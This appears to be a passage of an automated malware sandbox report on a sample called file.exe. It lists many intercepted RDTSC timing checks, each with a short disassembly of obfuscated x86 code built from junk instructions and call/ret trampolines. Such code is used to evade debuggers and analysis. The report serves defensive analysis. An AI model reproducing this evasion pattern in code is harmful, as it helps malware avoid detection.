          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB012 second address: 9CB094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a jns 00007F1FDD1C120Ah 0x00000010 mov ebx, dword ptr [ebp+122D2C17h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1FDD1C1208h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2393h], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F1FDD1C1208h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 jmp 00007F1FDD1C1218h 0x00000059 push eax 0x0000005a pushad 0x0000005b je 00007F1FDD1C120Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB094 second address: 9CB09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9463 second address: 9C9467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC094 second address: 9CC106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1FDD1C1436h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1FDD1C1438h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 sub ebx, 2C2C4139h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F1FDD1C1438h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b xor bx, C5E5h 0x00000050 push 00000000h 0x00000052 mov di, dx 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F1FDD1C143Ah 0x0000005f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC106 second address: 9CC10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC10C second address: 9CC136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F1FDD1C1446h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD189 second address: 9CD18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE110 second address: 9CE11A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE11A second address: 9CE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D3432h], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F1FDD1C1208h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b sbb di, BD3Ah 0x00000030 push 00000000h 0x00000032 jnc 00007F1FDD1C120Ch 0x00000038 mov ebx, dword ptr [ebp+122D39C5h] 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE169 second address: 9CE16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE16D second address: 9CE171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE171 second address: 9CE17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F1FDD1C1436h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE17F second address: 9CE183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF131 second address: 9CF1AD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C1438h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D1FC8h], esi 0x00000014 mov ah, 92h 0x00000016 popad 0x00000017 push 00000000h 0x00000019 movzx edi, cx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F1FDD1C1438h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov di, si 0x0000003b mov edi, dword ptr [ebp+122D1D24h] 0x00000041 jnp 00007F1FDD1C144Eh 0x00000047 call 00007F1FDD1C1444h 0x0000004c mov di, ax 0x0000004f pop ebx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F1FDD1C1444h 0x00000058 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE3AA second address: 9CE3BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C1210h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE3BE second address: 9CE3C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D020B second address: 9D0230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F1FDD1C120Ch 0x00000013 je 00007F1FDD1C1206h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0230 second address: 9D023A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF32B second address: 9CF330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF330 second address: 9CF335 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D125F second address: 9D1269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3873 second address: 9D387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D1462 second address: 9D146C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D146C second address: 9D1470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D1470 second address: 9D1474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D152B second address: 9D1531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D74F1 second address: 9D74F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC6AD second address: 9DC6B7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97485A second address: 974870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1FDD1C120Eh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5FD1 second address: 9E5FDE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5FDE second address: 9E5FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E62B2 second address: 9E62EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1448h 0x00000007 jmp 00007F1FDD1C1445h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1FDD1C143Ah 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E62EF second address: 9E62FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F1FDD1C1206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E65FB second address: 9E65FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E687F second address: 9E6891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F1FDD1C120Ch 0x0000000c jnc 00007F1FDD1C1206h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6891 second address: 9E689B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E689B second address: 9E689F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E689F second address: 9E68E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1445h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F1FDD1C143Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 ja 00007F1FDD1C1456h 0x00000019 jmp 00007F1FDD1C143Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E68E2 second address: 9E68E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EB14D second address: 9EB19A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1FDD1C143Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F1FDD1C1436h 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F1FDD1C1436h 0x0000001a popad 0x0000001b push esi 0x0000001c jmp 00007F1FDD1C1448h 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 ja 00007F1FDD1C1442h 0x0000002a js 00007F1FDD1C1436h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EB19A second address: 9EB1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F1FDD1C1211h 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F1FDD1C1206h 0x00000014 popad 0x00000015 jmp 00007F1FDD1C1214h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jp 00007F1FDD1C1206h 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EB1D9 second address: 9EB1F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EB4A8 second address: 9EB4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EB4AE second address: 9EB4D7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F1FDD1C1445h 0x00000010 jmp 00007F1FDD1C143Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 js 00007F1FDD1C1436h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EB83C second address: 9EB85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1FDD1C1215h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EAEBD second address: 9EAEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1FDD1C1436h 0x0000000a jmp 00007F1FDD1C143Dh 0x0000000f popad 0x00000010 jmp 00007F1FDD1C1448h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 977DBF second address: 977DED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F1FDD1C1206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F1FDD1C1216h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F1FDD1C1206h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EF8F8 second address: 9EF902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B38EE second address: 99DED1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jp 00007F1FDD1C1217h 0x0000000e nop 0x0000000f xor edi, 20F50C05h 0x00000015 mov edx, dword ptr [ebp+122D1C66h] 0x0000001b lea eax, dword ptr [ebp+12488655h] 0x00000021 mov dword ptr [ebp+122D2063h], ecx 0x00000027 push eax 0x00000028 ja 00007F1FDD1C1231h 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dx, 7995h 0x00000035 call dword ptr [ebp+12466EFCh] 0x0000003b jne 00007F1FDD1C1217h 0x00000041 pushad 0x00000042 jmp 00007F1FDD1C120Ch 0x00000047 jp 00007F1FDD1C120Eh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3DA7 second address: 9B3DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3DAE second address: 9B3DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3F65 second address: 9B3FBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jnp 00007F1FDD1C143Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007F1FDD1C1440h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jno 00007F1FDD1C1441h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4128 second address: 9B412E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B412E second address: 9B4133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4263 second address: 9B426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B433E second address: 9B4363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4363 second address: 9B4368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B47F9 second address: 9B47FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4B94 second address: 9B4B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99EA71 second address: 99EA7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99EA7A second address: 99EA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1FDD1C1206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFBE3 second address: 9EFBE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFBE7 second address: 9EFBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFD6F second address: 9EFD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F1FDD1C143Bh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFD83 second address: 9EFD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1FDD1C1206h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFD8F second address: 9EFD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFD93 second address: 9EFDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F1FDD1C1206h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFDA3 second address: 9EFDF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F1FDD1C1436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F1FDD1C1447h 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jbe 00007F1FDD1C1436h 0x0000001d jl 00007F1FDD1C1436h 0x00000023 jmp 00007F1FDD1C1446h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EFDF3 second address: 9EFDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F00A3 second address: 9F00A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F00A7 second address: 9F00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F00AB second address: 9F00B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F00B3 second address: 9F00B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F01F2 second address: 9F01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F01F6 second address: 9F0230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1218h 0x00000007 jc 00007F1FDD1C1206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1FDD1C1218h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F6367 second address: 9F63A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C143Ch 0x00000008 jl 00007F1FDD1C1444h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F1FDD1C1457h 0x00000016 pushad 0x00000017 jmp 00007F1FDD1C1443h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F63A7 second address: 9F63AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4D45 second address: 9F4D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1FDD1C1446h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4D69 second address: 9F4D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5041 second address: 9F505C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1FDD1C143Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F1FDD1C146Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F505C second address: 9F5083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C120Dh 0x00000009 jno 00007F1FDD1C1206h 0x0000000f popad 0x00000010 pushad 0x00000011 jnl 00007F1FDD1C1206h 0x00000017 jl 00007F1FDD1C1206h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5083 second address: 9F5089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F52E2 second address: 9F52E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
